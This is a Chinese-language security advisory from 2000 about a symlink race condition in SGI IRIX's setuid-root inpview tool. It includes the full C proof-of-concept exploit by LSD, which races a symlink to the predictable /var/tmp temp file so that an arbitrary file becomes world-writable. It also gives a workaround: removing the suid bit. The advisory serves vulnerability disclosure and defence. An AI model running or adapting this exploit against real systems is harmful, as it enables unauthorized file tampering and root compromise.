IRIX inpview 链接竞争漏洞
发布日期:2000-08-04
更新日期:2000-08-04
受影响系统:
描述:
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.4
SGI IRIX 6.5.3m
SGI IRIX 6.5.3f
SGI IRIX 6.5.3
SGI IRIX 6.5.2m
SGI IRIX 6.5.1
SGI IRIX 6.5
某些版本IRIX下的inpview会在/var/tmp/目录下不安全地建立临时文件,这些临时文
件名并不随机,用户可以建立一个符号链接到其他文件,利用inpview的
setuid-to-root权限覆盖其他文件,同时对应文件权限被更改成0666。inpview本身
是一个网络多媒体集成工具。
<* 来源:LSD contact@lsd-pl.net *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*## /usr/lib/InPerson/inpview #*/
/* sets rw-rw-rw permissions */
#include <sys/types.h>
#include <dirent.h>
#include <stdio.h>
main ( int argc, char * argv[] )
{
DIR * dirp;
struct dirent * dentp;
printf( "copyright LAST STAGE OF DELIRIUM jan 2000 poland //lsd-pl.net/\n" );
printf( "/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all\n\n" );
if ( argc != 2 )
{
printf( "usage: %s file\n", argv[0] );
exit( -1 );
}
if( !fork() )
{
nice( -20 );
sleep( 2 );
close( 0 );
close( 1 );
close( 2 );
execle( "/usr/lib/InPerson/inpview", "lsd", 0, 0 );
exit( 0 );
}
printf( "looking for temporary file... " );
fflush( stdout );
chdir( "/var/tmp" );
dirp = opendir( "." );
while ( 1 )
{
if ( ( dentp = readdir( dirp ) ) == NULL )
{
rewinddir( dirp );
continue;
}
if ( !strncmp( dentp->d_name, ".ilmpAAA", 8 ) )
{
break;
}
}
closedir( dirp );
printf( "found!\n" );
while ( 1 )
{
if ( !symlink( argv[1], dentp->d_name ) )
{
break;
}
}
sleep( 2 );
unlink( dentp->d_name );
execl( "/bin/ls", "ls", "-l", argv[1], 0 );
}
建议:
暂无
临时解决办法:
去掉它的suid root属性
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
